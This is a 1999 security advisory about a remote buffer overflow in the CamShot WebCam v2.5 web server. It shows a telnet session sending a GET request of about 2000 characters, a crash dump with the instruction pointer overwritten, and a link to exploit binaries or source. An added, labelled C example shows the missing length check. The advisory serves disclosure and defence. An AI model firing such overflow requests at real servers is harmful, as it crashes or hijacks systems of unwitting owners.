Subject: [w00giving '99 #17] Broadgun's Camsoft Webcam v2.5 web server

Release Date: December 30, 1999

Systems Affected:
CamShot WebCam v2.5 for Win9x/WinNT and possibly other versions

About The Software:
CamShot is a Windows 95/98/NT web server that serves up web pages containing
time stamped images captured from a video camera.  The images can be
viewed from anywhere on the network with a web browser.

THE PROBLEM

UssrLabs found a remote buffer overflow due to improper bounds checking,
which is caused by passing a lengthy GET command.  This vulnerability will
allow the execution of arbitrary code.

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html

Example:
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 

Where (buffer) is approx. 2000 characters. At this point the server overflows.

On the remote machine, someone will see something like this:

CAMSHOT caused an invalid page fault in
module  at 0000:61616161.
Registers:
EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246
EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058
ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff
EDX=bff76855 ES=0187 EDI=005a0104 GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8
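
An added example (not part of the original advisory, and not CamShot's code) of the bounds check whose absence is described under THE PROBLEM: a request-line parser that compares the request target's length with the destination buffer before copying and returns 414 instead of overflowing. The function names and the 255-byte limit are assumptions; the advisory does not give CamShot's real buffer size.

```c
#include <stdio.h>
#include <string.h>

#define MAX_TARGET 255  /* assumed limit; the real buffer size is not on the page */

/* Hypothetical helper: parse "METHOD SP target SP version" from one request line.
 * Returns 200 on success, 400 if malformed, 414 if the target does not fit. */
int parse_request_line(const char *line, size_t len,
                       char *target, size_t target_sz)
{
    const char *end = line + len;
    const char *sp1 = memchr(line, ' ', len);
    if (sp1 == NULL || sp1 == line)
        return 400;                       /* no method or no separator */
    const char *start = sp1 + 1;
    const char *sp2 = memchr(start, ' ', (size_t)(end - start));
    if (sp2 == NULL || sp2 == start)
        return 400;                       /* empty target or no version */
    size_t tlen = (size_t)(sp2 - start);
    /* The missing step: check the client-controlled length against the
     * destination size (leaving room for the NUL) before any copy. */
    if (tlen >= target_sz)
        return 414;                       /* Request-URI Too Long */
    memcpy(target, start, tlen);
    target[tlen] = '\0';
    return 200;
}

/* Constructed sample input: "GET /" + n filler bytes + " HTTP/1.1". */
int demo_status(size_t n)
{
    static char line[4096];
    char target[MAX_TARGET + 1];
    if (n > sizeof line - 16)             /* keep the sample inside `line` */
        return -1;
    memcpy(line, "GET /", 5);
    memset(line + 5, 'a', n);
    memcpy(line + 5 + n, " HTTP/1.1", 9);
    return parse_request_line(line, 5 + n + 9, target, sizeof target);
}

int main(void)
{
    printf("10-byte target:   %d\n", demo_status(10));
    printf("2000-byte target: %d\n", demo_status(2000));
    return 0;
}
```

With the check in place, a request of the size shown in the Example is rejected with a status code before any byte reaches the fixed-size buffer.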

Binary or source for this: http://www.ussrback.com/
Vendor Status: Contacted
Program URL: http://broadgun.com/Camshot.htm

SOLUTION
Wait for the vendor to release a patch.

Greetings:
eEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and
Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com



